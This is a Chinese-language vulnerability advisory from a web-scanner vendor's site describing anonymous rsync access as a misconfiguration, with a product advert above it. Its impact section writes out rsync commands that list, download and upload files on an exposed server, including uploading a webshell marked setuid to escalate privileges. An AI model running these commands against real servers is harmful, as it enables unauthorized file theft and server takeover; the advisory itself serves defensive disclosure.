360鹰眼-更智能的Web安全监控系统

产品描述:

下一代web漏洞扫描器,她是一款硬件,包含:最全面的"爬出"引擎,不再需要收集资产清单,不再需要指定扫描时间,同步发现新上线业务漏洞

适用对象:

企业

价格服务:

目录价19.8万起
我了解,我要试用
高危高危

目标存在Rsync匿名访问漏洞

WASC Threat Classification

发现时间:

2016-02-25

漏洞类型:

配置错误

所属建站程序:

其他

所属服务器类型:

通用

所属编程语言:

其他

描述:

Rsync(remote synchronize)是一款实现远程同步功能的软件,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。
rsync是用 “rsync 算法”提供了一个客户机和远程文件服务器的文件同步的快速方法,而且可以通过ssh方式来传输文件,提高其保密性。
此外,rsync是一款免费的软件。
rsync 包括如下的一些特性:
能更新整个目录和树和文件系统。
有选择性的保持符号链链、硬链接、文件属于、权限、设备以及时间等。
对于安装来说,无任何特殊权限要求。
对于多个文件来说,内部流水线减少文件等待的延时。
能用rsh、ssh 或直接端口做为传输入端口。
支持匿名rsync 同步文件,是理想的镜像工具。

危害:

rsync默认允许匿名访问,若未添加用户口令则可以进行匿名登录。 建议对rsync的IP访问进行限制以防止在用户口令被猜解或泄露时造成损失。
常用的rsync操作:
rsync X.X.X.X:: #列出同步目录
rsync X.X.X.X::www/ #列出同步目录中的www目录
rsync -avz X.X.X.X::www/test.php /root #下载文件到本地
rsync -avz X.X.X.X::www/ /var/tmp #下载目录到本地
rsync -avz webshell.php X.X.X.X::www/ #上传本地文件到rsync服务器
利用rsync提权
rsync进程默认以root权限启动,利用rsync同步文件的同时,可以保持原来文件的权限的特性,可以使用rsync进行提权。


chmod a+s webshell.php
rsync -avz webshell.php X.X.X.X::www/

解决方案:

为rsync 设置一个口令

如果你的网站服务器是Windows系统,建议使用"主机卫士"修复漏洞,点击下载
对该漏洞进行评论